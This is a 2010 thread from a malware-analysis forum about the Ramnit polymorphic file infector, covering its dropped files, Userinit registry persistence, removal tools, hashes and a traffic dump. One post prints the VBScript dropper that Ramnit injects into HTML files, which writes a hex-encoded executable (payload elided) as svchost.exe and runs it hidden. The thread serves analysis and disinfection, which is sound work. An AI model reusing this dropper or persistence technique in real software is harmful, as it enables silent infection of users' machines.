A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1914  by Sneakyone
 Fri Aug 13, 2010 12:13 am
Hi everybody.

It seems this new infection is a new polymorphic file infector and it infects ALOT of files and once they are cleaned it infects them + more again, similar to virut/sality.

I will ask these two users who are badly infected with it to format in a minute, just want to bring this to the attention of everyone.

(Note: Look at the ESET logs, it is the one that picked up the infected files.)

1. http://www.geekpolice.net/virus-spyware ... t23218.htm

2. http://www.pchelpforum.com/progress-hij ... post532721

The file Desktoplayer.exe is the main part of the infection it will keep re-appearing and infecting more files.

Also, it will create a dummy files that look like this:

FirefoxSrv.exe
UserinitSrv.exe
ExplorerSrv.exe

My suggestion is running a ESET scan as soon as you see desktoplayer.exe and if it finds a ton of infected files tell them to format without backing anything up.

It is unfortunate, but that is the only way so far.
 #1915  by Quads
 Fri Aug 13, 2010 12:47 am
http://www.threatexpert.com/report.aspx ... 975182c819

This could be added inside .htm and .html files on hard drives

<script Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A...00"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>

They are having fun here http://www.bleepingcomputer.com/forums/topic336044.html

Looks lie they are getting somewhere with this one http://www.bleepingcomputer.com/forums/topic335436.html

Quads
 #1917  by Sneakyone
 Fri Aug 13, 2010 3:31 am
Hi.

Thanks for the reply.

I will try to continue working on it now, but it will probably get lengthy, if you have any more suggestions they will be greatly appreciated. ;)
 #1923  by PX5
 Fri Aug 13, 2010 9:03 am
lol@bleeping link, dudes machine is toasted.

Ramnit = FUFI! :lol:
 #1925  by Quads
 Fri Aug 13, 2010 9:47 am
Hmmmm just depends, I had 2 PC's turn up needing Malware removed, early on when Virut appeared and the systems were infected with Virut + rootkits, I managed to remove Virut and the other Malware, without needing to reinstall Windows or reformat as the user did not have the Dell OS discs or backups.

It was fun, took some time and only had to reinstall a couple of 3 party programs and Windows files replaced.

Quads
 #1931  by SecConnex
 Fri Aug 13, 2010 3:33 pm
I did a short analysis of it last night, because after a while it got a little scary. :P But anyway, in testing it, I came up with a few conclusions, I believe I should share about this infection.

Win32\Ramnit is a fairly new infection, with three currently active variants. Normally, they pair with each other when infecting the machine.

The first variant is a backdoor trojan that looks like ZBOT. The second variant is a rootkit that looks like TDL3 and behaves like Trojan.Agent, and a worm that spreads via removable media. The third variant, and the final, is a polymorphic file infection that behaves like Sality and looks like Virut.

(Keep in mind, I states heuristic terms here, "looks like", "behaves like".

Behavior

-Modifies the Userinit key in Winlogon:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="c:\windows\system32\userinit.exe,,c:\program files\microsoft\desktoplayer.exe"


-Reads running processes, then creates dummy files named after the running processes and infects most files loaded in running processes, and sends the legit files to a bak folder locked from Windows API. For example: userinitsrv.exe

-Creates its main file: c:\program files\microsoft\desktoplayer.exe, which is known as itself, Trojan.Ramnit, the trojan downloader or malware dropper.

-The main trojan component is known to be Trj.Agent, while the dummy files are infected with Trj.IRCNite, an IRC trojan, and ZBOT.

-It uses rootkit techniques to conceal its presence on the system. It *may* infect two random system files, which is related to TDL3.


Removal

-Most online scanners will detect it. Also, MBAM will detect some of it, especially subtle changes in the OS. ComboFix will delete odd looking files.


Overall, the damage to the system is too great, that we are recommending a primary disinfection, then reformat and reinstall.

Here is how it should be disinfected:

A. TDSSKiller
B. ComboFix
C. Reformat and reinstall.

You cannot allow the infected drivers to stay put. They need to be disinfected, or the infection can carry over, even with a reformat and reinstall.
 #1932  by EP_X0FF
 Fri Aug 13, 2010 3:35 pm
Providing dropper sample will be very good.
 #1933  by SecConnex
 Fri Aug 13, 2010 3:41 pm
I'm so sorry. I lost access to the internet after most files got infected. I attempted to grab some samples, but the infection was too great.

I suppose I could have attempted to reverse a couple of the files, and grab some of their malcode.

I got the MD5 of DesktopLayer.exe, which is its main file: 1E28B93DF4DC13BA183D7CAC665BC45E

MD5 of a couple infected files: 074A688443FAEA25C2589975069DE044

I did get a little bit of traffic code, though:

Port 443
00000010 | 0000 7A65 7573 5553 0008 0000 0075 736F | ..zeusUS.....uso
00000020 | 772E 6578 6500 FF4C 0000 00E2 0021 0000 | w.exe..L.....!..
00000080 | 0000 0064 6F67 6D61 000E 0000 0031 3238 | ...dogma.....128
00000090 | 3033 3536 3236 392E 6578 65E8 00FF 4C00 | 0356269.exe...L.
00000120 | 0100 0000 280A 0000 0200 0000 5365 7276 | ....(.......Serv
00000130 | 6963 6520 5061 636B 2032 0000 0000 0000 | ice Pack 2......


VirusTotal: http://www.virustotal.com/file-scan/rep ... 1281653802
http://www.virustotal.com/file-scan/rep ... 1281446347
 #1937  by fatdcuk
 Fri Aug 13, 2010 5:27 pm
Hi EP,

Heres a Z-bot patched by Ramnit.A

LOL Jay ...same as Virut/Sality/Parite..they like appending their code to files(and that includes other malwares shock,horror)...

PX5 can vouch for what a mess this made in a VM for him earliar this week...i had to reload selector too :lol:
Attachments
(242.59 KiB) Downloaded 301 times
 #1952  by SecConnex
 Fri Aug 13, 2010 8:51 pm
Rofl. I think I need a better VM. I've only had VBox for quite a while.

I need my test machine back, because I hate working in VMs with new infections. They seem to just kill the VM.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 10